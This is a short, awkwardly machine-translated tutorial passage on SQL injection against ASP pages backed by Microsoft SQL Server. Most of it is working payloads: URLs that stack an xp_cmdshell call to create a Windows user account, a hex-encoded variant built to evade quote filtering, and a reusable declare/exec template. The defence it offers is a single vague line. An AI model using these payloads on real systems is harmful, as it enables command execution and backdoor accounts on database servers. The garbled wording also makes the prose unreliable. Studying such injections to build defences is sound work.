Including the implementation and application of SQL injection, which I wrote, is also an example of this, since no filtering is encountered, so it is fairly easy to inject success, as follows:
Copy Code code as follows:
Http://www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ' net user Angel Pass/add ';--
This often leads to misunderstanding, that as long as the variable filtered ' can prevent SQL injection attacks, this awareness for a large number of programs can be injected into the curse, in fact, just filter ' is not enough, in the ' filtered case we play, look at the following statement:
Copy Code code as follows:
Http://www.jb51.net/show.asp?id=1;declare%20@a%20sysname%20select%20@a= 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec% 20master.dbo.xp_cmdshell%20@a;--
Is it a big difference from the one above? But the effect is exactly the same. In fact, these are all SQL statements.
Copy Code code as follows:
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
This is the "net User Angel Pass/add" in the 16 format. A friend who knows SQL is easy to understand, declare a variable A, then assign our instruction to a, and then call variable A to finally execute the command we entered. Variable a can be any command. As follows:
Copy Code code as follows:
declare @a sysname
Select @a=
EXEC Master.dbo.xp_cmdshell @a
Solution:
Filter variables to restrict entry to only certain characters. For example, a variable with a numeric type restricts data that can only be entered into numeric types. I will not tell you the details. This is exactly what the program author is free to play.